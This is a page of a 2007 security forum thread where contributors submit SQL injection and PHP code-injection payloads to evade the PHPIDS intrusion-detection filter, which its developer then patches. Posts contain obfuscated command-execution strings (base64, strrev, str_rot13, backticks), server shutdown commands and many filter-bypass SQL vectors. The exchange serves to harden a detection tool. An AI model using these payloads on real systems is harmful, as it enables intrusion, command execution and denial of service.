Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...678910111213141516...LastNext
Current Page: 11 of 31
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 03, 2007 10:48AM

MSSQL DoS/slow down (if thats still in the scope of the project):

--> ?test=1'; anything: goto anything -- -a (php-ids)
--> ?test=1'; WAITFOR TIME '17:48:00 ' shutdown -- -a (php-ids)


Never worked with it, but in addition to tx php injections these two would also work I think:

--> ?test=aa"; { passthru("shutdown -s"); } // (php-ids)
--> ?test=aa"; shell_exec("shutdown -s"); // (php-ids)



Edited 1 time(s). Last edit at 10/03/2007 11:03AM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 03, 2007 10:57AM

Hi!

I think I have them all fixed again w/o too much false positives (at least the tests tell me so *g*).

@tx: The RFE vectors are awesome again - i am still very glad that PHP demands way more strictness for its coding than other languages! ;)

@Reiners: Wow - neat. Especially the ultra short ones were very hard to come by.

Thank a lot again - I think we'll be ready for 0.4.2 soon! Btw - I will be afk from 7th to 14th of October and lying around close to a swimming pool so forgive me if there will be no fixes during that time ;)

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 03, 2007 11:17AM

Hi .mario!
very nice fixes!!
only one little injection slipped through:
' =+ ' (php-ids)

greetings and relaxing vacation,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 03, 2007 11:23AM

Yikes - fixed, thx! ;)

I started to add first material to the VectorWiki - it's still very basic though and the admins haven't set the sub domain yet..

https://trac.php-ids.org/wiki/VectorWiki

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 03, 2007 11:26AM

I wont let you go to vacation now ;)
asd' =- (-'asd') -- -a (php-ids)
asd' |1 != (1)#aa (php-ids)



Edited 3 time(s). Last edit at 10/03/2007 12:05PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 03, 2007 12:08PM

another fix to earn my holidays ;) thx!

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 03, 2007 01:03PM

watch out for spaces:
asd' =- ( - 'asd' ) -- -a (php-ids)

It's just incredible how flexible the MySQL syntax is. MSSQL is much more strict on that.
Note that I have edited the first and the third post on this page while you responded so quickly, so maybe you overlooked it.

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 03, 2007 09:10PM

Hi!
Again some MySQLi ... some dont make sense actually, but they all work. damn MySQL, not only javascript is weird. As you can see its almost always the same trick: using alot of different prefixes and brackets. But I thought the more examples given - the easier is the fixing. So it isnt actually that much as it looks ;)

' =+ - ' (php-ids)
asd' =+ ('asd') -- -a
asd' =+-('asd') -- -a (php-ids)
asd' =+ - ( + 'asd' ) -- -a (php-ids)

asd' |+(1) != '1 (php-ids)
asd' |(1) != +'1 (php-ids)

aa'+2 = '0 (php-ids)
aa' - 2 =+ -'0 (php-ids)
aa'+2-((-1)) =+ -'0 (php-ids)

0' XOR+ -'1 (php-ids)

aa' LIKE + -'0 (php-ids)
aa'LIKE+ -'0
aa'LIKE (0) -- -a
aa'LIKE +(0) -- -a
aa'LIKE + ( -0) -- -a (php-ids)

aa' REGEXP+ - '0 (php-ids)
aa' REGEXP+ -(- 0) -- -a (php-ids)

aa' SOUNDS LIKE+ -'1 (php-ids)
aa' SOUNDS LIKE+ (1) -- -a (php-ids)
(works not if column type is int)

aa' in +(0) -- -a(php-ids)
aa' in +(-0,-1) -- -a
aa'in+ ('aa') or -1 != '0 (php-ids)

root@localhost' =+ current_user -- -a (php-ids)
(attacker need to figure out what the default user is, so this is probably not that dangerous)

As you can see, on MySQL you can use prefixes, spaces, brackets and quotes almost everywhere and as much as you like. It is really really hard to filter all those things correctly I think.

PHPi:
"; { if (true) passthru("dir"); } // (php-ids)

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: October 04, 2007 10:33AM

Well I've been messing with Javascript again :)

This doesn't work (score of 5) but I thought I'd post it anyway:-
new Image().src= !null?'javascriptz:zalertz(1)'['split']('z')['join']([]):0

Tested under Opera but may also work in IE

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 04, 2007 11:27AM

*finished fixing* you mean 10 ;)

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 04, 2007 11:31AM

Hi .mario!
very nice fixes, its getting harder and harder ;)

aa' LIKE 0 -- -a (php-ids)
aa' LIKE md5(1) or '1 (php-ids)
aa' REGEXP- md5(1) or '1 (php-ids)
aa' DIV@1 = 0 or '1 (php-ids)
aa' XOR- column != -'0 (php-ids)

The first expression often doesnt work on its own. its correct syntax, but it doesnt return true. I just use it to place the "or" on a different place than right behind the quote (where it is impossible to get it to work undetected ;)

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 04, 2007 01:16PM

@.mario: The filters are getting really challenging now.

Here's some variations on a PHPi that Reiners posted yesterday:
http://demo.php-ids.org/?test=%22%3B%7B%20if%20%28true%29%20%24_a%20%20%3D%20%22%22%20.%20strtolower%28%22pass%22%29%3B%0Aif%20%20%20%281%29%20%24_a.%3D%20%22%22%20.%20strtolower%28%22thru%22%29%3B%20%0A%24_a%28%20%22dir%22%29%3B%20%7D%20//
?test=";{ if (true) $_a  = "" . strtolower("pass");
if   (1) $_a.= "" . strtolower("thru"); 
$_a( "dir"); } //
http://demo.php-ids.org/?test=%22%3B%7B%20if%20%28true%29%20%24_a%20%20%3D%20%22%22%20.%20str_replace%28%27%21%27%2C%27%27%2C%27s%21y%21s%21t%21e%21m%21%27%29%3B%0A%24_a%28%20%22dir%22%29%3B%20%7D%20//
?test=";{ if (true) $_a  = "" . str_replace('!','','s!y!s!t!e!m!');
$_a( "dir"); } //

Some new techniques in this one: http://demo.php-ids.org/?test=%22%20%3B%20//%0A%24_y%20%3D%20%22%22%20.%20strrev%28%22ftnirp%22%29%3B%0Aif%20%20%28%210%29%20%20%20%20%24_a%20%3D%20base64_decode%20%3B%0Aif%20%20%28%210%29%20%20%20%20%24_b%3D%22%22%20.%20%24_a%28%27cHdk%27%29%3B%0Aif%20%28%210%29%20%24_y%28%60%24_b%60%29%3B//
?test=" ; //
$_y = "" . strrev("ftnirp");
if  (!0)    $_a = base64_decode ;
if  (!0)    $_b="" . $_a('cHdk');
if (!0) $_y(`$_b`);//

EDIT: This one could use some explaining. Payload is a base64 encoded command in the b GET variable, the code parses the query_string and assigns the $_GET['b'] to $b which is then decoded and ran through the backtick execution operators (``) and output through an aliased printf. Also note that eval respects new lines so the comment marks don't actually comment any code. http://demo.php-ids.org/?test=%22%20%3B%20//%0Aif%20%20%28%210%29%20%24_a%20%3D%20base64_decode%20%3B%0Aif%20%20%28%210%29%20%24_b%20%3D%20parse_str%20%3B%20//%0A%24_c%20%3D%20%22%22%20.%20strrev%28%22ftnirp%22%29%3B%0Aif%20%20%28%210%29%20%20%24_d%20%3D%20QUERY_STRING%3B%20//%0A%24_e%3D%20%22%22%20.%20%24_SERVER%5B%24_d%5D%3B%0A%24_b%28%24_e%29%3B%20//%0A%24_f%20%3D%20%22%22%20.%20%24_a%28%24b%29%3B%0A%24_c%28%60%24_f%60%29%3B//&b=cHdk
?test=" ; //
if  (!0) $_a = base64_decode ;
if  (!0) $_b = parse_str ; //
$_c = "" . strrev("ftnirp");
if  (!0)  $_d = QUERY_STRING; //
$_e= "" . $_SERVER[$_d];
$_b($_e); //
$_f = "" . $_a($b);
$_c(`$_f`);//

EDIT: Shorter variation shoving all identifiable names into the request string. (Register Globals = On) http://demo.php-ids.org/?test=%22%3B%20//%0A%24_c%20%3D%20%22%22%20.%20%24_a%28%24b%29%3B%0A%24_b%28%60%24_c%60%29%3B//&b=ZGly&_a=base64_decode&_b=printf
?test="; //
$_c = "" . $_a($b);
$_b(`$_c`);//

This is how the attack would actually look:
h++p://victim.com/index.php
?injection_point=%22%3B%20//%0A%24_c%20%3D%20%22%22%20.%20%24_a%28%24b%29%3B%0A%24_b%28%60%24_c%60%29%3B//
&b=ZGly
&_a=base64_decode
&_b=printf
&submit=submit


EDIT: I just realized, I wrote one of those vectors redundantly it should be:
?test=" ; //
if  (!0) $_b = parse_str ; //
$_c = "" . strrev("ftnirp"); //
$_e= "" . $_SERVER[$_d];
$_b($_e); //
$_f = "" . $_a($b);
$_c(`$_f`);//
attack looks like:
h++p://demo.php-ids.org/?test=%22%20%3B%20//%0Aif%20%20%28%210%29%20%24_b%20%3D%20parse_str%20%3B%20//%0A%24_c%20%3D%20%22%22%20.%20strrev%28%22ftnirp%22%29%3B%20//%0A%24_e%3D%20%22%22%20.%20%24_SERVER%5B%24_d%5D%3B%0A%24_b%28%24_e%29%3B%20//%0A%24_f%20%3D%20%22%22%20.%20%24_a%28%24b%29%3B%0A%24_c%28%60%24_f%60%29%3B//
&b=cHdk
&_a = base64_decode
&_d=QUERY_STRING

It still gets caught (Score: 7) but I felt I should at least clarify.

-tx @ lowtech-labs.org



Edited 15 time(s). Last edit at 10/08/2007 11:41PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 04, 2007 08:52PM

blah, blah, blah another variation. I was thinking about sirdarckcat and eval'ing document.location. pretty much the concept that there is certain data that isn't likely to be checked (either due to possibility or context), ie. in the case of javascript the post hash characters, and in this case, certain variables. This is related to the Register Globals=On vector, which has damn near infinite possibilites, but seems extremely difficult to filter against. (I mean
?test=" ; $_a( `$_b` );//
could potentially root or completely DoS a server (and get's through the filter of course) but really, how common is that vulnerability? But then again, if you've got code that's eval'ing a string that contains user input and your server has Register Globals set to 'on', you're pretty much asking to get pwnd. *shrug*
Anyway, enough talk: http://demo.php-ids.org/?test=%22%20%3B%20//%0Aif%20%28%210%29%20%24_a%20%3D%20%22%22%20.%20str_rot13%28%27cevags%27%29%3B%20//%0A%24_b%20%3D%20HTTP_USER_AGENT%3B%20//%0A%24_c%3D%20%22%22%20.%20%24_SERVER%5B%24_b%5D%3B%20//%0A%24_a%28%20%60%24_c%60%20%29%3B//
Vector works with register globals off and executes whatever the user has put in their user-agent, on the command line.
?test=" ; //
if (!0) $_a = "" . str_rot13('cevags'); //
$_b = HTTP_USER_AGENT; //
$_c= "" . $_SERVER[$_b]; //
$_a( `$_c` );//

I think perhaps these php vectors are getting a bit too esoteric. @.mario: just say the word and I'll go back to something more sensible. :)
sure is fun though!

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 10/04/2007 09:13PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 05, 2007 05:52AM

@tx: Nice ones indeed! Nope - there's nothing esoteric enough as long as it works - but I guess the next code execution vectors should be a little bit more complicated to inject ;) Thanks again!

@Reiners: Thx - i will take care of those ASAP! *fixed*

Greetings,
.mario



Edited 1 time(s). Last edit at 10/05/2007 11:00AM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 05, 2007 07:40PM

@.mario: Great fixes again, you're making this nice and fun. I can only tip my hat to your regex prowess... it's a lot easier for me to get around these rules than it would be for me to write them! *tips hat*

Anyway, the
(?:<[?%](?:php)?.*(?:[?%]>)?)|(?:;\s*\$\w+\s*=)|(?:\$\w+\s*=(?:(?:\s*\$?\w+\s*[(;])|\s*".*"))
rule can be circumvented by prepending a null value to the string/constant/function name thats being assigned to a variable: http://demo.php-ids.org/?test=%22%3B%7B%20if%20%28true%29%20%24_a%20%20%3D%20%24_n%20.%20str_replace%28%27%21%27%2C%27%27%2C%27s%21y%21s%21t%21e%21m%21%27%29%3B%20//%0A%24_a%28%20%22dir%22%29%3B%20%7D%20//
?test=";{ if (true) $_a  = $_n . str_replace('!','','s!y!s!t!e!m!'); //
$_a( "dir"); } //
Where $_n is anything that evaluates to null or false. (ie !1 , any uninitialized variable, equations, etc., but not anything that === 0), here are a few examples/test cases:
?test=";{ if (true) $_a  = !1 . str_replace('!','','s!y!s!t!e!m!'); //
$_a( "dir"); } //
?test=";{ if (true) $_a  = @(1/0) . str_replace('!','','s!y!s!t!e!m!'); //
$_a( "dir"); } //

I think catching anything matching the pattern:
{",'}; {any characters} ${alphanums,_} = {any characters} . {any characters};
would effectively kill that vector (and alot of potential variations).

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 10/05/2007 10:03PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 06, 2007 08:22AM

Hi!

Thanks, tx. I added a new pattern for that kind of injection - pretty much like the one you suggested.

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 06, 2007 01:25PM

@.mario: That's catching just about everything now. Just one more:
http://demo.php-ids.org/?test=%22%3B//%0A%7B%20if%20%28%21%22%7D%22%29%7B%0A%3B%0A%7Delse%7B%20%24_a%20%20%3D%20%21%22%29%22%20.%20str_replace%28%22%21%22%2C%22%22%2C%22s%21y%21s%21t%21e%21m%21%22%29%3B%20//%0A%24_a%28%20%22dir%22%29%3B%20%7D%7D%20//
?test=";//
{ if (!"}"){
;
}else{ $_a  = !")" . str_replace("!","","s!y!s!t!e!m!"); //
$_a( "dir"); }} //

Have a good vacation! :)

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 10/06/2007 01:25PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 07, 2007 03:11AM

aa'LIKE(0) -- -a (php-ids)
aa'regexp(0) -- -a (php-ids)
consider that you can use prefixes and spaces in the brackets as well as infront of the brackets, since these are not functions.

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 07, 2007 07:21AM

Hi!

Thanks guys - see you back in a week...

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 15, 2007 11:11AM

Hi!

I survived the vacation and even managed to fix the latest injections ;) Furthermore I added support for the ENTITY/ELEMENT xml injection patterns and some dangerous hex entities
when coming to sql injections.

We will change the paths in the config from relative to absolute the next days (this will take some time because we have to rewrite the whole test suite) - after that we will release 0.4.2.

@Reiners: I would like to feature an article/interview with you on php-ids.org about sql injection and webappsec in general. Please drop me a line if you are interested.

Greetings!
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 16, 2007 02:13AM

Hi .mario!
welcome back ;) I'm really looking forward to the interview, although I feel a bit awkward to speak beside all the other experts since I'm somewhat new to webappsec. I will give my best ;)

aa' like(0) -- -a (php-ids)
aa' regexp (0) -- -a (php-ids)
(space behind the quote)

greetings,
Reiners

----------------
edit:

'/1=' (php-ids)
aa'/1='0
aa'/1 like '0
aa'/1 or+1=+'1
aa'/0 is null-- -a

aa'%1='0 (php-ids)
aa'%1 or+1=+'1

aa'<3 or+1=+'1 (php-ids)
aa'<=3 or+1=+'1
aa'<<3 or+1=+'1

aa'^0='0 (php-ids)
aa'^3 or+1=+'1

aa'&1='aa (php-ids)
aa'&1 or+1=+'1

The trick is to place some unfiltered math operations before the real injection. Besides the "or" you can also use "like" and "regexp" of course.

edit²:
aa' like +0 -- (php-ids)



Edited 3 time(s). Last edit at 10/18/2007 09:57AM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 22, 2007 07:30AM

adding more math to circumvent new filters:

(php-ids) aa'/1 DIV 1 or+1=+'1
(php-ids) aa'&0+1='aa
(php-ids) aa' like(0) + 1-- -a
(php-ids) aa'^0+0='0
(php-ids) aa'^0+0+1-1=(0)-- -a
(php-ids) aa'<3+1 or+1=+'1
(php-ids) aa'%1+0='0
(php-ids) '/1/1='

as always, there are quite some modifications possible by using different operands, prefixes, spaces, quotes and (brackets).

operand = array("^", "=", "!=", "%", "/", "&", "&&", "|", "||", "<", "<<", ">", ">>", ">=", "<=", "<>", " XOR ", " DIV ");
prefix = array("+", "-", "~", "!", "@", " ");

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 23, 2007 04:01AM

Hi Reiners!

Thx again - they all should be fixed by now. Tomorrow we will release 0.4.2 and after that I will get back to you for the interview.

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 23, 2007 09:42AM

Hi .mario!
I'm looking forward to that =)
As mentioned in my last post there are a lot of modifications possible. some examples:

(php-ids) aa'/1 or '1 (different payload)
(php-ids) aa'/1 regexp '0 (different payload)
(php-ids) ' / 1 / 1 =' (spaces)
(php-ids) '/1=' (unfixed ;)
(php-ids) aa'&0+1 = 'aa (spaces)
(php-ids) aa'&+1='aa (prefix)
(php-ids) aa'&(1)='aa (or bracket)
(php-ids) aa'^0+0 = '0 (spaces)
(php-ids) aa'^0+0+1-1 = (0)-- -a (spaces)
(php-ids) aa'^+-3 or'1 (prefixes)
(php-ids) aa'^0!='1 (different operand)
(php-ids) aa'^(0)='0 (brackets)
(php-ids) aa' < (3) or '1 (brackets)
(php-ids) aa' <<3 or'1 (different payload)
(php-ids) aa'-+!1 or '1 (prefixes)
(php-ids) aa'-!1 like'0 (prefixes)
(php-ids) aa' % 1 or '1 (spaces)

greetings,
Reiners



Edited 1 time(s). Last edit at 10/23/2007 09:53AM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 24, 2007 02:52AM

Hi!

They should all be fixed right now - the tests tell me so ;) Thanks again - some of them were really hard to come by!

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 24, 2007 09:01AM

Hi .mario!
new stuff for you ;)
most common trick is still using spaces:

(php-ids) aa' / '1' < '3
(php-ids) aa' / +1 < '3
(php-ids) aa' - + ! 2 != + - '1
(php-ids) aa' - + ! 1 or '1
(php-ids) aa' / +1 like '0
(php-ids) ' / + (1) / + (1) ='
(php-ids) aa' & +(0)-(1)='aa
(php-ids) aa' ^+ -(0) + -(0) = '0
(php-ids) aa' ^ + - 3 or '1
(php-ids) aa' ^ +0!='1
(php-ids) aa' < +3 or '1
(php-ids) aa' % +1 or '1

but as I said, there are so many different modifications possible its hard to get them all ;)

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: October 24, 2007 10:19AM

Hi!

Those were hard ones again but I think they taught me to write a rule that catches all of the latest submissions... let's see *fixxed*

;)

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 24, 2007 12:10PM

damn, tough rule, very nice !! Could not modify one of the above attacks successfully.
I just noted a missing prefix before "like" in the rule:

(php-ids) aa'like!'1

Very nice fixes.
greeting,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 24, 2007 01:57PM

another two:

(php-ids) '< ~' (yes, it works on mysql ;)
([url=http://demo.php-ids.org/?test=1'%20%3C%20ascii('1')%20%23aaa 1']php-ids[/url]) 1' < ascii('1') #aaa
0' !=+ ascii('1') #aaa
0' = + ! ascii('1') #aaa

greetings,
Reiners

Options: ReplyQuote
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: October 24, 2007 03:13PM

.mario,
This is still undetected:
http://demo.php-ids.org/?test=%27%20or%20MATCH%20%28username%29%20AGAINST%20%28%27+admin%20-asds%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a
?test=' or MATCH (username) AGAINST ('+admin -asds' IN BOOLEAN MODE); -- -a

-tx @ lowtech-labs.org

Options: ReplyQuote
Pages: PreviousFirst...678910111213141516...LastNext
Current Page: 11 of 31


Sorry, only registered users may post in this forum.